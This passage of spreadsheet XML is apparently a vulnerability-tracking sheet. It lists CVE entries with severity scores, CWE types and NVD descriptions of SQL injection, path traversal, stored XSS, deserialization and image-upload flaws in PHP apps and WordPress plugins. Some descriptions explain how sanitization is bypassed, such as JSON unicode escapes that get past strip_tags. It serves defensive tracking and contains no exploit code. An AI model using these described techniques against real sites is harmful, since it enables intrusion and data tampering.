      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected is an unknown function of the file updatefaculty.php. This manipulation of the argument fid causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97885</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100372</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>ClipBucket v5 before 5.5.3-#197 contains a path traversal vulnerability in the admin template editor that allows authenticated administrators to overwrite PHP files by supplying directory traversal sequences in the folder parameter. Attackers with manage_template_access permission can traverse outside the layout directory to modify executable PHP files and achieve remote code execution as the web server user.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100372</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33639</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane interpolates the administrator-controlled tax_rate_decimal_places setting into an ALTER TABLE statement for ip_tax_rates in Settings::index() without strict integer validation. A crafted setting value can add clauses to the schema-changing statement and remove or alter required database columns. The resulting schema corruption can permanently modify financial data structures and make the application unavailable. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33639</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42323</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/batch_manager.php accepts administrator-controlled dimension width, height, and ratio values and filesize values from the Batch Manager filter URL without numeric validation. The URL filter parser stores those values in the bulk_manager_filter session state, and later query construction concatenates them into SQL predicates, unlike the validated POST filter path. An authenticated administrator can use crafted filter values to execute time-based or other SQL expressions and potentially disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42323</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42324</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/element_set_ranks.php stores administrator-controlled image_order[] values without enforcing the existing sort-field whitelist. The stored album image_order expression is later concatenated into ORDER BY clauses by admin/batch_manager_global.php, admin/batch_manager_unit.php, include/section_init.inc.php, and include/ws_functions/pwg.categories.php. When at least one album contains at least one photo, an authenticated administrator can store a crafted expression and trigger it in a later album or Batch Manager query to disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42324</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83591</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via Regex Transformation in all versions up to, and including, 1.1.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The crafted payload uses only WordPress-permitted comment tags and attributes (an anchor with href and title), and the AMP sanitizer pipeline omits javascript: protocol blocking, meaning neither the comment save filter nor the AMP output stage removes the malicious URI introduced by the transformation.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83591</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84279</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'output_format' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the Pro Export/Genius feature to be enabled on the site, as the vulnerable fpd_pr_export AJAX action is only registered when that feature is active.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84279</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84280</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Order 'elements[].title' Parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload is written to the DOM via innerHTML within the beforeElementAdd JavaScript event handler when processing the elements[].title field from the stored order JSON, meaning execution occurs specifically when an administrator reviews shortcode orders in the WordPress admin panel.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84280</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84281</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'productTitle' in '_fpd_data' Order Item Meta in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The fpd_save_order AJAX action is registered for unauthenticated users via wp_ajax_nopriv_fpd_save_order with no nonce or capability check, and the strip_tags() sanitization applied at save time is bypassed by submitting JSON unicode escape sequences (e.g. \u003c, \u003e), which json_decode() silently converts back to literal angle brackets when the order is rendered in the admin view.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84281</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84862</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to insecure deserialization in the Quartz JDBC job store. An authenticated attacker could exploit this vulnerability to execute arbitrary code on the affected system.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84862</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85750</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Piwigo before v16.4.0 is vulnerable to arbitrary file read and remote code execution in image upload handling when using the Imagick library due to insufficient validation and unsafe processing of user-supplied image files. By abusing format confusion (e.g., disguising SVG content as PNG), an attacker can trigger unintended interpretation of embedded SVG elements that reference local files. In more advanced scenarios, the Imagick support for Magick Scripting Language (MSL) may be abused to process attacker-controlled instructions, potentially leading to unauthorized server-side file writes and remote code execution, depending on configuration. This has been patched in 16.4.0.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85750</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93303</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via 'form_data' Rich Text Field via Draft Save/Resume in all versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires tricking a user into clicking an attacker-supplied draft resume URL, which the attacker constructs using the draft_key and access_token returned directly in the save response.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93303</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93654</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'cart_items[][product_name]' Parameter in all versions up to, and including, 7.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The checkout REST route uses permission_callback set to __return_true and the invoice loader performs no order ownership check, meaning an unauthenticated attacker can both persist the payload and ensure it is renderable to any logged-in user who accesses the invoice.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93654</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94573</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Elementor Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Field Value in all versions up to, and including, 2.2.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94573</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95864</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>The Themify Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'css[fonts]' Parameter in all versions up to, and including, 7.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce required to reach the vulnerable endpoint is embedded in plain sight within the front-end page markup for all visitors, reducing the access control to a CSRF token rather than an authentication barrier and making the endpoint fully exploitable by unauthenticated attackers.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95864</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95866</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.003</v>
      </c>
